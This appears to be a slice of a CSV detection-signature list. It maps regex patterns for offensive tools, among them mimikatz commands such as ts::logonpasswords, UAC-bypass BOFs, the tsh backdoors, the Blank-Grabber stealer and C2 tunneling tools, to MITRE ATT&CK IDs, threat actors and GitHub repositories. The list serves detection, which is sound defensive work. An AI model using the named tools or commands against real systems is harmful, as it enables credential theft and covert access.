"*trufflesecurity/trufflehog*",".{0,1000}trufflesecurity\/trufflehog.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","1","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61651"
"*TruffleSnout.exe*",".{0,1000}TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","61652"
"*--trusted-for-delegation --kdcHost *",".{0,1000}\-\-trusted\-for\-delegation\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","61656"
"*TrustedPathDLLHijack*",".{0,1000}TrustedPathDLLHijack.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","61657"
"*TrustedPath-UACBypass-BOF*",".{0,1000}TrustedPath\-UACBypass\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","61658"
"*trustedsec/DitExplorer*",".{0,1000}trustedsec\/DitExplorer.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","61659"
"*trustedsec/social-engineer-toolkit*",".{0,1000}trustedsec\/social\-engineer\-toolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","61660"
"*trustedsec/specula*",".{0,1000}trustedsec\/specula.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","61661"
"*trustedsec/unicorn*",".{0,1000}trustedsec\/unicorn.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","61662"
"*TrustExec.exe -m exec*",".{0,1000}TrustExec\.exe\s\-m\sexec.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61663"
"*Try opening it with Mimikatz now :)*",".{0,1000}Try\sopening\sit\swith\sMimikatz\snow\s\:\).{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","61664"
"*try_to_crack_hash(*",".{0,1000}try_to_crack_hash\(.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#content","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","61665"
"*TryA9ain/BypassAddUser*",".{0,1000}TryA9ain\/BypassAddUser.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","61666"
"*Trying anon RCE using * for *",".{0,1000}Trying\sanon\sRCE\susing\s.{0,1000}\sfor\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","61667"
"*Trying to bypass UAC (Application will restart)*",".{0,1000}Trying\sto\sbypass\sUAC\s\(Application\swill\srestart\).{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","61668"
"*Trying to disable defender*",".{0,1000}Trying\sto\sdisable\sdefender.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","61669"
"*Trying to dump kernel to C:*",".{0,1000}Trying\sto\sdump\skernel\sto\sC\:.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","61670"
"*Trying to exclude bound file from defender*",".{0,1000}Trying\sto\sexclude\sbound\sfile\sfrom\sdefender.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","61672"
"*Trying to exclude the file from Windows defender*",".{0,1000}Trying\sto\sexclude\sthe\sfile\sfrom\sWindows\sdefender.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","61673"
"*ts.php*vi.txt*",".{0,1000}ts\.php.{0,1000}vi\.txt.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61674"
"*ts::logonpasswords*",".{0,1000}ts\:\:logonpasswords.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61675"
"*ts::mstsc*",".{0,1000}ts\:\:mstsc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61676"
"*ts::multirdp*",".{0,1000}ts\:\:multirdp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61677"
"*ts::remote*",".{0,1000}ts\:\:remote.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61678"
"*ts::sessions*",".{0,1000}ts\:\:sessions.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61679"
"*tsh_linux_amd64 *",".{0,1000}tsh_linux_amd64\s.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#linux","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","61680"
"*tsh_runshell(*",".*perror\("".*""\)|.*pel_(send|recv)_msg\(.*\)|.*tsh_(runshell|get_file|put_file)\(.*","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux #content","N/A","10","6","568","130","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z","61681"
"*tshd_linux_amd64 *",".{0,1000}tshd_linux_amd64\s.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#linux","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","61687"
"*tshd_windows_amd64.exe *",".{0,1000}tshd_windows_amd64\.exe\s.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","61688"
"*tspkg/decryptor.py*",".{0,1000}tspkg\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","61689"
"*tufhackteam@gmail.com*",".{0,1000}tufhackteam\@gmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61692"
"*tun2socks/releases/download*",".{0,1000}tun2socks\/releases\/download.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","61693"
"*tun2socks-main.zip*",".{0,1000}tun2socks\-main\.zip.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","61694"
"*tun2socks-windows-*.exe*",".{0,1000}tun2socks\-windows\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","61695"
"*TunnelGRE/Augustus*",".{0,1000}TunnelGRE\/Augustus.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/TunnelGRE/Augustus","1","1","N/A","N/A","6","2","131","26","2024-07-27T14:47:45Z","2023-08-21T15:08:40Z","61710"
"*Tunneling failed! Start your own port forwarding/tunneling service at port *",".{0,1000}Tunneling\sfailed!\sStart\syour\sown\sport\sforwarding\/tunneling\sservice\sat\sport\s.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","61711"
"*TunnelVision/pushrouteconfig.sh*",".{0,1000}TunnelVision\/pushrouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","61724"
"*turn_keylogger*",".{0,1000}turn_keylogger.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","61734"
"*TVqQAAMAAAAEAAAA*",".{0,1000}TVqQAAMAAAAEAAAA.{0,1000}","offensive_tool_keyword","base64","start of an executable payload in base64","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","61738"
"*TVqQAAMAAAAEAAAA*",".{0,1000}TVqQAAMAAAAEAAAA.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","61739"
"*TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADn8UE*",".{0,1000}TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADn8UE.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","61740"
"*Tw1sm/PySQLRecon*",".{0,1000}Tw1sm\/PySQLRecon.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","1","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","61741"
"*Tw1sm/RITM*",".{0,1000}Tw1sm\/RITM.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","1","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","61742"
"*Tw1sm/spraycharles*",".{0,1000}Tw1sm\/spraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","1","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","61743"
"*twint -g=*km* -o * --csv*",".{0,1000}twint\s\-g\=.{0,1000}km.{0,1000}\s\-o\s.{0,1000}\s\-\-csv.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61744"
"*twint -u * --since *",".{0,1000}twint\s\-u\s.{0,1000}\s\-\-since\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61745"
